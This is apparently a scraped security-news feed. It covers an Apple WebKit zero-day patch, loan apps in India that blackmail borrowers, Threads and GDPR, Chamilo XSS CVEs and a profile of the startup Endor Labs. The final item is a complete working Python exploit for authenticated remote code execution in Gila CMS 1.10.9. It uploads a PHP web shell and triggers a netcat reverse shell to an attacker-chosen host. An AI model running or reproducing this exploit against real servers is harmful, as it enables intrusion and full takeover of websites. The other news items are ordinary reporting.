Categories: Exploits and vulnerabilities
Categories: News
Tags: Apple

Tags:  Safari

Tags:  WebKit

Tags:  macOS

Tags:  iOS

Tags:  iPadOs

Tags:  CVE-2023-37450

Tags:  drive-by

Tags:  code execution

Apple has issued an update for a zero-day vulnerability in the WebKit browser engine which may be actively exploited.



(Read more...)




The post Apple issues Rapid Security Response for zero-day vulnerability appeared first on Malwarebytes Labs.

Apple has issued an update for a vulnerability which it says may have been actively exploited.

In the security content for Safari 16.5.2 we can learn that the vulnerability was found in the WebKit component which is Apple’s web rendering engine. In other words, WebKit is the browser engine that powers Safari and other apps. On iOS and iPadOS even third-party browsers have to use WebKit under the hood. So, it’s no surprise that this update is available for a range of operating systems (OSs).

For most users, no action is required. Apple devices are configured to implement Rapid Security Responses as the default setting automatically. If needed, users will receive a prompt to restart their device.

Rapid Security Response (RSR) is a new type of software patch delivered between Apple's regular, scheduled software updates. Previously, Apple security fixes came bundled along with features and improvements, but RSRs only carry security fixes. They're meant to make the deployment of security improvements faster and more frequent. According to an Apple notice about RSRs, the new updates "may also be used to mitigate some security issues more quickly, such as issues that might have been exploited or reported to exist 'in the wild'." RSR was first introduced in May of 2023.

To check whether you have RSR enabled, select System Settings. In the **Settings** window, click on (General and Software) **Update**, then **Automatic Updates**, and make sure the toggle is turned on for **Install Security Responses and system files**.

It may be important to note that the first attempt to patch this vulnerability, offered as iOS 16.5.1 (a), reportedly broke some sites. This first attempt was pulled hours after release. Apple then followed up with this latest update.

The Common Vulnerabilities and Exposures (CVE) database lists publicly disclosed computer security flaws. The CVE patched in this updates is:

CVE-2023-37450: Processing web content may lead to arbitrary code execution. The issue was addressed with improved checks.

While Apple doesn't disclose, discuss, or confirm security issues until a patch is made available and users have had the opportunity to apply them, what we can conclude from that description is that the bug could be used for drive-by downloads as it might allow an attacker to execute arbitrary code by tricking users into opening web pages containing specially crafted content.

**We don’t just report on vulnerabilities—we identify them, and prioritize action.**

Cybersecurity risks should never spread beyond a headline. Keep vulnerabilities in tow by using Malwarebytes Vulnerability and Patch Management.

Apple issues Rapid Security Response for zero-day vulnerability

Categories: Personal
Tags: app

Tags:  finance

Tags:  india

Tags:  loan

Tags:  rogue

Tags:  Apple Store

Tags:  play store

Tags:  google

Tags:  threaten

Tags:  blackmail

Tags:  sextortion

Tags:  fake

Tags:  deepfake

Tags:  deepfakes

Tags:  morph

Multiple finance apps have been removed from the App Store after making dubious charges and issuing blackmail threats and other awful behavior.



(Read more...)




The post Threatening rogue finance apps removed from the Apple Store appeared first on Malwarebytes Labs.

Multiple apps have been removed from the App Store in India after a large helping of unethical behaviour was aimed at their users. TechCrunch reports that “Pocket Kash, White Kash, Golden Kash, and OK Rupee” among others were taken down after getting close to the top 20 finance app listing spots. The reason? These finance apps came with dubious charges and a chilling line in blackmail and threatening behaviour.

Here’s a user review from a month or so ago:

> “I borrowed an amount in a helpless situation and \[…\] a day before repayment due date I got some messages with my pic and my contacts in my phone saying that repay your loan otherwise they will inform our contacts that you r not paying loan."

While this sets the scene for the behaviour which ultimately had the apps taken down, worse was still to come.

Someone reached out to an individual working in media with a very disturbing message related to one of the apps. In it, their friend’s sister took out a loan and was met with threats to send “her nude pics” to her contacts. The nudes weren’t real: they’d been “morphed”, according to the message sender. We assume they mean a deepfake, which are of course notoriously easy to create either via specialist websites or apps.

> Wtf is this, a personal loan app called Kash is threatening to send morphed nude photos of their customer to her entire contact list?! pic.twitter.com/5LcsukVgef
> 
> — Sandhya Ramesh (@sandygrains) July 3, 2023

Some of the apps were also impersonating legitimate app developers, which means lots of time and hassle spent trying to prove that they’re not involved. This is a common scam, so much so that large lists have been compiled of apps suspected of being involved in this particular tactic of blackmail and threatening behaviour.

Back in March, “seven entities and five individuals” were charged in a similar case where an individual was threatened after taking out a loan. Obscene and intimidating messages were sent to the victim by SMS, apps, and phone calls along with threats to upload photographs to adult websites.

Meanwhile, there are a growing number of faked nude photos ending up in the news in relation to these bogus finance apps. Sadly, there are also reports of some victims committing suicide after becoming caught in these fraudulent activities. In the above link, the fake finance apps are on the Google Play store. The bogus app developers are clearly looking to cast as wide a net as possible in their quest for ill-gotten gains. In some cases, fakers will impersonate senior law enforcement officers on rogue websites to make the scam even more convincing.

Apple has pulled “at least” half a dozen apps, but it’s clear that this is a bit of a booming industry and will take a lot of work to stamp out completely. If you’re thinking about taking out a loan via an app, it’s worth taking the time to research which companies are legitimate and take things from there. Check the reputation of the organisation, read those reviews, and find out what level of cover is available from both the store and lender should things go wrong. Do your best to ensure everything is above board before committing to anything, as this definitely isn’t something you want to become tangled up in.

**We don’t just report on threats—we remove them**

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

Threatening rogue finance apps removed from the Apple Store

GDPR is halting Meta's new Threads app from entering EU markets, portending a broader struggle over the right ways to collect user data on social apps.

Upcoming data privacy regulations are preventing Meta's new microblogging app "Threads" from launching in European Union (EU) markets. Experts say this is only the beginning of the privacy battle facing the Twitter clone.

Meta's attempted coup d'etat against the Twitter kingdom launched on Wednesday in over 100 countries, earning tens of millions of users in only its first day live. That, despite being unavailable to major markets within the EU.

The holdup has to do with "complexities with complying with some of the laws coming into effect next year," Instagram CEO Adam Mosseri hinted on July 5. Mosseri's statement may refer to the new antitrust-oriented Digital Markets Act, but experts also expect Threads to collide head-on with consumer privacy regulations, thanks to its wanton collection of just about every kind of personal data imaginable.

    

Source: Search Engine Journal

"It seems likely that they're worried about the risk of rolling out something new that very clearly violates General Data Protection Regulation (GDPR) guidelines," says Aaron Mendes, CEO and co-founder of PrivacyHawk. But Threads' slow rollout doesn't preclude it from flourishing in the future. "Facebook has a reputation of rolling things out over time — they like to get stuff out fast, and then get information in and iterate."

**Everything Threads Will Know About You**

Meta has a history of conflict with regulators, owing to its liberal approach to consumer privacy. The EU has already fined the media giant to the tune of nine figures or more on multiple occasions.

Judging by its entry in the Apple app store, it's no wonder that Threads is being shielded from EU scrutiny. Browsing history, geolocations, health and financial information, and much more are all up for grabs. There's even a dedicated category for "sensitive information" which, according to Apple's documentation, includes "racial or ethnic data, sexual orientation, pregnancy or childbirth information, disability, religious or philosophical beliefs, trade union membership, political opinion, genetic information, or biometric data."

According to Mendes, there's no reason for users to suddenly freak out. For one thing, even the most egregious data collectors now provide settings for users to toggle what kinds of information they're willing to divulge. And at the end of the day, he points out, "Threads is effectively Instagram. You use Instagram to log into it. So it's all the same data collection, all the same protocols."

Threads does distinguish itself from its parent platform in its supplemental privacy policy. One rule of particular note: It'll only be possible to delete a Threads account by deleting the Instagram account associated with it.

Few of the tens of millions of people who've already signed up for Threads — or the hundreds of millions to come — are likely to know about this rule before it's too late. It just goes to show how "the customers are very, very disempowered," says Jim Killock, executive director of the Open Rights Group. "It's worth remembering that people have invested thousands and thousands of hours into building their networks on these platforms. We wouldn't tolerate this sort of behavior anywhere else."

**Can Meta Keep Up With GDPR?**

Even those who hold no quarter for Meta's approach to privacy may find certain GDPR regulations overly restrictive.

"EU laws make it very difficult to roll out a product, because of how they handle data sharing outside of EU borders," Mendes says. In May, for example, Meta got handed a colossal 1.3 billion Euro fine for transferring EU citizens' data to US servers, "which is kind of required to operate a service."

Initially, the Privacy Shield program provided a framework for data transfer between the US and EU, but the European Court of Justice struck it down on July 16, 2020. A new Trans-Atlantic Data Privacy Framework was agreed on in March, but hasn't been enacted yet.

Even if the EU has good reason to want to maintain legal control over its citizens' data, Mendes says, it's unduly difficult for global brands to keep all their data in one place, "unless you create a copy of your product that's completely siloed and works in the EU, separate from the one that you have, let's say, in the United States, which is an engineering nightmare, because now you have to maintain two versions of your product."

"There's never a simple balance," Killock admits. "It's about respecting the desires of customers on one hand, and on the other hand ensuring that companies can do business."

In some cases, he says, rules can help both regulators and users without being overly restrictive to companies. He points to the UK's right to data portability law as a way to foster competition, and naturally discourage Meta's more unsavory practices. "Whether we're talking about moderation standards or privacy standards, it allows people escape routes, and that creates actual commercial pressure on these companies to behave better."

"That," he thinks, "will empower not just users but also regulators to say: 'Look, people don't like this practice, you shouldn't be doing it."

Meta's Rush to Topple Twitter Sets Up Looming Privacy Debate

Chamilo 1.11.x up to 1.11.20 allows users with admin privilege account to insert XSS in the classes/usergroups management section.

CVE-2023-37067: Security issues - Chamilo LMS

Chamilo 1.11.x up to 1.11.20 allows users with admin privilege account to insert XSS in the session category management section.

CVE-2023-37065: Security issues - Chamilo LMS

Chamilo 1.11.x up to 1.11.20 allows users with admin privilege account to insert XSS in the extra fields management section.

CVE-2023-37064: Security issues - Chamilo LMS

Chamilo 1.11.x up to 1.11.20 allows users with admin privilege account to insert XSS in the skills wheel.

CVE-2023-37066: Security issues - Chamilo LMS

Chamilo 1.11.x up to 1.11.20 allows users with admin privilege account to insert XSS in the careers & promotions management section.

CVE-2023-37063: Security issues - Chamilo LMS

The company, one of four finalists in Black Hat USA's 2023 startup competition, looks for the vulnerabilities an attacker could actually access.

As the Log4j vulnerability demonstrated in a visceral way, open source code is inextricable from modern software. Developers incorporate components, snippets, and libraries from sources like GitHub when writing their own programs so they don't have to reinvent the wheel every time they build a cart. But that means most software has dependencies even its developers don't know about, which can lead to not realizing when a vulnerability report applies to their mission-critical applications — or to scrambling to fix a severe vulnerability that is completely cut off from any source code and thus harmless.

"With 90% of code in modern applications being open source and 95% of vulnerabilities being found in transitive dependencies \[the software packages automatically brought in by OSS\], security teams struggle to prioritize the right risks for engineering to work on," says Endor Labs CEO and co-founder Varun Badhwar. And that's the company's focus: prioritizing risk across open source software, CI/CD pipelines, and secrets.

Endor does this using dependency life cycle management, which takes into account a variety of metrics to calculate an overall risk score that a company can use to set security policies. It emphasizes how a dependency is used in the organization rather than the severity of a vulnerability. Even the worst vuln, the thinking goes, doesn't matters if an attacker can't actually get to it.

**Why Reachability Analysis?**

The company calls its approach "reachability analysis." By building a complete inventory of software and then tracing every path to a vulnerability, Endor says it can determine which vulnerabilities need to be fixed right away and which can be set aside. Users can query the Endor Labs platform using DroidGPT, a chatbot that is now in beta, to figure out which open source package they can use in place of a more vulnerable one.

Where Endor really stands out, Badhwar says, is with its staff: A third of the R&D team have earned doctorates. The focus on specialization carries through to the company's "decision to tackle one problem at a time to solve it in the right way," he says.

    

DroidGPT search results for cryptographic packages in Go. (Source: Endor Labs)

That first problem was open source dependencies. "We made the decision to start there and invest heavily in reachability analysis before we move forward into other solutions," Badhwar says.

The next focus areas will be prioritized secret scanning and supply chain management/configuration posture management, he adds.

**Return of the Contest**

The four finalists in the Black Hat Startup Spotlight — Endor Labs, Gomboc, Binarly, and Mobb — will present their business models to a panel of judges at the Mandalay Bay in Las Vegas on Wednesday, Aug. 9. (Of the finalists, Endor Labs is the only one that also made the finals at the 2023 RSAC Innovation Sandbox.) Dark Reading's editor-in-chief, Kelly Jackson Higgins, will host the event, which begin at 4:30 p.m. PT.

If you're attending Black Hat in person, Endor Labs hopes to attract you to its booth with a platform demo, a cute mascot, and Star Wars keychain/bottle openers. You might also get an invite to Endor Labs' event at the Topgolf driving range and sports bar.

Speaking of Endor, the swag is a clue to the inspiration for the company's name. No, it doesn't refer to the Canaanite village where the biblical Saul consulted a witch. In this case, Endor is the forest moon in the Star Wars universe where Ewoks live. The company's security research team is even named "Station 9" after a research station on Endor.

As Badhwar says, "The story behind the name is simple — we're just huge nerds."

**Speed Round**

**Website:** https://www.endorlabs.com/  
**Founded:** 2022  
**Funding stage:** Seed  
**Total funding raised so far:** $25M  
**Number of employees:** 50  
**If the company were a band, what would its band name be, and what kind of band would it be:** "We would simply be named The Ewoks and play futuristic synth-rock."  
**Pineapple on pizza, yea or nay?:** "We posted this question to the company Slack, and it almost sparked a civil war, but the result was an exact 50/50 split, which our marketing team will break and decide YES on pineapple on pizza." — Thuy Nguyen, director of demand generation at Endor Labs

Startup Spotlight: Endor Labs Focuses on Reachability

Gila CMS version 1.10.9 suffers from a remote code execution vulnerability.

    # Exploit Title: Gila CMS 1.10.9 - Remote Code Execution (RCE) (Authenticated)# Date: 05-07-2023# Exploit Author: Omer Shaik (unknown_exploit)# Vendor Homepage: https://gilacms.com/# Software Link: https://github.com/GilaCMS/gila/# Version: Gila 1.10.9# Tested on: Linuximport requestsfrom termcolor import coloredfrom urllib.parse import urlparse# Print ASCII artascii_art = """ ██████╗ ██╗██╗      █████╗      ██████╗███╗   ███╗███████╗    ██████╗  ██████╗███████╗██╔════╝ ██║██║     ██╔══██╗    ██╔════╝████╗ ████║██╔════╝    ██╔══██╗██╔════╝██╔════╝██║  ███╗██║██║     ███████║    ██║     ██╔████╔██║███████╗    ██████╔╝██║     █████╗  ██║   ██║██║██║     ██╔══██║    ██║     ██║╚██╔╝██║╚════██║    ██╔══██╗██║     ██╔══╝  ╚██████╔╝██║███████╗██║  ██║    ╚██████╗██║ ╚═╝ ██║███████║    ██║  ██║╚██████╗███████╗ ╚═════╝ ╚═╝╚══════╝╚═╝  ╚═╝     ╚═════╝╚═╝     ╚═╝╚══════╝    ╚═╝  ╚═╝ ╚═════╝╚══════╝                              by Unknown_Exploit"""print(colored(ascii_art, "green"))# Prompt user for target URLtarget_url = input("Enter the target login URL (e.g., http://example.com/admin/): ")# Extract domain from target URLparsed_url = urlparse(target_url)domain = parsed_url.netloctarget_url_2 = f"http://{domain}/"# Prompt user for login credentialsusername = input("Enter the email: ")password = input("Enter the password: ")# Create a session and perform loginsession = requests.Session()login_payload = {    'action': 'login',    'username': username,    'password': password}response = session.post(target_url, data=login_payload)cookie = response.cookies.get_dict()var1 = cookie['PHPSESSID']var2 = cookie['GSESSIONID']# Prompt user for local IP and portlhost = input("Enter the local IP (LHOST): ")lport = input("Enter the local port (LPORT): ")# Construct the payloadpayload = f"rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/bash+-i+2>%261|nc+{lhost}+{lport}+>/tmp/f"payload_url = f"{target_url_2}tmp/shell.php7?cmd={payload}"# Perform file upload using POST requestupload_url = f"{target_url_2}fm/upload"upload_headers = {    "Host": domain,    "Content-Length": "424",    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36",    "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundarynKy5BIIJQcZC80i2",    "Accept": "*/*",    "Origin": target_url_2,    "Referer": f"{target_url_2}admin/fm?f=tmp/.htaccess",    "Accept-Encoding": "gzip, deflate",    "Accept-Language": "en-US,en;q=0.9",    "Cookie": f"PHPSESSID={var1}; GSESSIONID={var2}",    "Connection": "close"}upload_data = f'''------WebKitFormBoundarynKy5BIIJQcZC80i2Content-Disposition: form-data; name="uploadfiles"; filename="shell.php7"Content-Type: application/x-php<?php system($_GET["cmd"]);?>------WebKitFormBoundarynKy5BIIJQcZC80i2Content-Disposition: form-data; name="path"tmp------WebKitFormBoundarynKy5BIIJQcZC80i2Content-Disposition: form-data; name="g_response"content------WebKitFormBoundarynKy5BIIJQcZC80i2--'''upload_response = session.post(upload_url, headers=upload_headers, data=upload_data)if upload_response.status_code == 200:    print("File uploaded successfully.")    # Execute payload    response = session.get(payload_url)    print("Payload executed successfully.")else:    print("Error uploading the file:", upload_response.text)

Tag

#apple